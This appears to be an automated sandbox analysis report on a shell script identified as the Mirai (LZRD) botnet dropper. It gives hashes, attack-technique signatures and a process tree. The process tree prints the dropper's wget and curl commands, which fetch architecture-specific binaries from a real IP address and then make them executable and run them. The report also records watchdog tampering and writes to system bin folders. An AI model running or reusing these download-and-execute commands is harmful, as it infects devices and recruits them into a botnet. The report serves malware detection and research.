Analysis
-
max time kernel
139s -
max time network
151s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
25-12-2024 07:55
Static task
static1
Behavioral task
behavioral1
Sample
1.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
1.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
1.sh
Resource
debian9-mipsbe-20240418-en
General
-
Target
1.sh
-
Size
2KB
-
MD5
f4851a3204539048964a4c54ae3802a3
-
SHA1
0c8507b985f3ae1ae758b5954cbe932419109bdd
-
SHA256
1d3098bddc2fba5485bb668b5da435ac0d740f8ec7b80d4f1a87e2f43a22ab91
-
SHA512
03f75f8f44c3259293734a04aa854fb1057172ebc51ee5277ecc63f2b5ba894d6c2163cf48467e8003b0e979ad613bfe6bf1c2be192fd5d1c92627592a5ad6a3
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 1495 chmod 1512 chmod 1574 chmod 1624 chmod 1522 chmod 1532 chmod 1552 chmod 1604 chmod 1634 chmod 1489 chmod 1542 chmod 1564 chmod 1584 chmod 1594 chmod 1614 chmod -
Executes dropped EXE 15 IoCs
ioc pid Process /tmp/Space 1490 Space /tmp/Space 1496 Space /tmp/Space 1513 Space /tmp/Space 1523 Space /tmp/Space 1533 Space /tmp/Space 1543 Space /tmp/Space 1553 Space /tmp/Space 1565 Space /tmp/Space 1575 Space /tmp/Space 1585 Space /tmp/Space 1595 Space /tmp/Space 1605 Space /tmp/Space 1615 Space /tmp/Space 1625 Space /tmp/Space 1635 Space -
Modifies Watchdog functionality 1 TTPs 28 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc Process File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space File opened for modification /dev/misc/watchdog Space File opened for modification /dev/watchdog Space -
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 28 IoCs
description ioc Process File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /sbin/watchdog Space File opened for modification /bin/watchdog Space -
resource yara_rule behavioral1/files/fstream-5.dat upx -
description ioc Process File opened for reading /proc/457/status Space File opened for reading /proc/19/status Space File opened for reading /proc/559/status Space File opened for reading /proc/163/status Space File opened for reading /proc/660/status Space File opened for reading /proc/709/status Space File opened for reading /proc/1137/status Space File opened for reading /proc/1361/status Space File opened for reading /proc/1179/status Space File opened for reading /proc/160/status Space File opened for reading /proc/948/status Space File opened for reading /proc/942/status Space File opened for reading /proc/1118/status Space File opened for reading /proc/1471/status Space File opened for reading /proc/129/status Space File opened for reading /proc/170/status Space File opened for reading /proc/1104/status Space File opened for reading /proc/1073/status Space File opened for reading /proc/1472/status Space File opened for reading /proc/26/status Space File opened for reading /proc/1338/status Space File opened for reading /proc/1221/status Space File opened for reading /proc/78/status Space File opened for reading /proc/115/status Space File opened for reading /proc/165/status Space File opened for reading /proc/701/status Space File opened for reading /proc/937/status Space File opened for reading /proc/1157/status Space File opened for reading /proc/164/status Space File opened for reading /proc/167/status Space File opened for reading /proc/5/status Space File opened for reading /proc/1570/status Space File opened for reading /proc/20/status Space File opened for reading /proc/1172/status Space File opened for reading /proc/538/status Space File opened for reading /proc/1274/status Space File opened for reading /proc/1101/status Space File opened for reading /proc/1176/status Space File opened for reading /proc/1110/status Space File opened for reading /proc/160/status Space File opened for reading /proc/11/status Space File opened for reading /proc/115/status Space File opened for reading /proc/161/status Space File opened for reading /proc/1066/status Space File opened for reading /proc/660/status Space File opened for reading /proc/1528/status Space File opened for reading /proc/660/status Space File opened for reading /proc/1536/status Space File opened for reading /proc/21/status Space File opened for reading /proc/1086/status Space File opened for reading /proc/115/status Space File opened for reading /proc/1516/status Space File opened for reading /proc/27/status Space File opened for reading /proc/17/status Space File opened for reading /proc/13/status Space File opened for reading /proc/328/status Space File opened for reading /proc/559/status Space File opened for reading /proc/84/status Space File opened for reading /proc/480/status Space File opened for reading /proc/22/status Space File opened for reading /proc/1066/status Space File opened for reading /proc/587/status Space File opened for reading /proc/477/status Space File opened for reading /proc/267/status Space -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 1539 wget 1540 curl 1529 wget 1530 curl -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/Space.arc curl File opened for modification /tmp/Space.i686 curl File opened for modification /tmp/Space.mips curl File opened for modification /tmp/Space.arm5 wget File opened for modification /tmp/Space.arm6 curl File opened for modification /tmp/Space.arm7 wget File opened for modification /tmp/Space.arm curl File opened for modification /tmp/Space.arm6 wget File opened for modification /tmp/Space.arm7 curl File opened for modification /tmp/Space.arc wget File opened for modification /tmp/Space.x86_64 curl File opened for modification /tmp/Space.mpsl wget File opened for modification /tmp/busybox cp File opened for modification /tmp/Space.x86 wget File opened for modification /tmp/Space.x86_64 wget File opened for modification /tmp/Space.mips wget File opened for modification /tmp/Space.arm wget File opened for modification /tmp/Space.ppc wget File opened for modification /tmp/Space.sh4 wget File opened for modification /tmp/Space.i686 wget File opened for modification /tmp/Space 1.sh File opened for modification /tmp/Space.mpsl curl File opened for modification /tmp/Space.x86 curl File opened for modification /tmp/Space.m68k wget File opened for modification /tmp/Space.m68k curl File opened for modification /tmp/Space.mips64 curl File opened for modification /tmp/Space.arm5 curl File opened for modification /tmp/Space.ppc curl File opened for modification /tmp/Space.sparc curl File opened for modification /tmp/Space.sh4 curl
Processes
-
/tmp/1.sh/tmp/1.sh1⤵
- Writes file to tmp directory
PID:1481 -
/bin/cpcp /bin/busybox /tmp/2⤵
- Writes file to tmp directory
PID:1482
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1483
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arc2⤵
- Writes file to tmp directory
PID:1487
-
-
/bin/catcat Space.arc2⤵PID:1488
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1489
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
PID:1490
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1492
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.x862⤵
- Writes file to tmp directory
PID:1493
-
-
/bin/catcat Space.x862⤵PID:1494
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.x86 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1495
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1496
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1509
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.x86_642⤵
- Writes file to tmp directory
PID:1510
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1512
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1513
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1519
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.i6862⤵
- Writes file to tmp directory
PID:1520
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.i686 Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1522
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1523
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1529
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1530
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1532
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1533
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
PID:1539
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mips642⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1540
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1542
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1543
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1549
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.mpsl2⤵
- Writes file to tmp directory
PID:1550
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR0 systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-timedated.service-UNAhXs2⤵
- File and Directory Permissions Modification
PID:1552
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1553
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1561
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm2⤵
- Writes file to tmp directory
PID:1562
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1564
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1565
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1571
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm52⤵
- Writes file to tmp directory
PID:1572
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1574
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1575
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1581
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm62⤵
- Writes file to tmp directory
PID:1582
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1584
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1585
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1591
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.arm72⤵
- Writes file to tmp directory
PID:1592
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1594
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1595
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1601
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.ppc2⤵
- Writes file to tmp directory
PID:1602
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1604
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1605
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.sparc2⤵PID:1611
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.sparc2⤵
- Writes file to tmp directory
PID:1612
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1614
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1615
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1621
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.m68k2⤵
- Writes file to tmp directory
PID:1622
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1624
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1625
-
-
/usr/bin/wgetwget http://154.216.20.216/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1631
-
-
/usr/bin/curlcurl -O http://154.216.20.216/hiddenbin/Space.sh42⤵
- Writes file to tmp directory
PID:1632
-
-
/bin/chmodchmod +x 1.sh busybox config-err-YaDWEb netplan_00jvjmdy snap-private-tmp Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64 ssh-IU2XV3AWLQa1 systemd-private-d46feef123ab45309818f9ae76d6c369-bolt.service-iawjZJ systemd-private-d46feef123ab45309818f9ae76d6c369-colord.service-MkWvhM systemd-private-d46feef123ab45309818f9ae76d6c369-ModemManager.service-ockDLB systemd-private-d46feef123ab45309818f9ae76d6c369-systemd-resolved.service-yB7gR02⤵
- File and Directory Permissions Modification
PID:1634
-
-
/tmp/Space./Space2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
PID:1635
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
37KB
MD5da67a7a6d3b11c7188cdd1bfce41d8e7
SHA1b4b1365eb6e4ed53740bd8a9ff4ae1aaef12364a
SHA256f0db6dd5f4fdfa71861aabd23456868437732315b06996d032e626f671dde651
SHA512a17fc2653174ebdd687ed0dae8282c70eeb68b887a92f3be64006d18d0a1dadc2b611e9f9767e0660ab272883d85af924c94b8898e817373eae3b66402b6e337
-
Filesize
113KB
MD5c6c3f3981d6747a4506fc97b272fb4e6
SHA1e29b9ebea53a040f736fe362a4559362003c19fa
SHA256dce7622fc110aff0758ddfc01829c68a13faa026fdbca5b037ea222989e5d56b
SHA512dfc70bfc84e828f15b0b8dc1e77f44efcc4fdd656133c1f3ec4cc6cea6687b1a490989a718348e52079c2388096107e2b0b56c1cf6083358cd0ce6451ac48844
-
Filesize
2.0MB
MD5b4dede5fc0b1bad5cb8e901bde126b97
SHA110cbe9a418ad84a1ed297948539d37aeb58dd810
SHA256a9f0735d28f9a6a4f2634d3b144156f7b3df3b476a16a5ab0c7bdf98d74dd020
SHA51245665ce3a42f63a01fdef517e0c4cb943efce64c8a32d3ce07ab4f1fafc23cda77f378d324342efc79dc9d2293c4b4454d06c1cf4997b9e866784de01cb546e6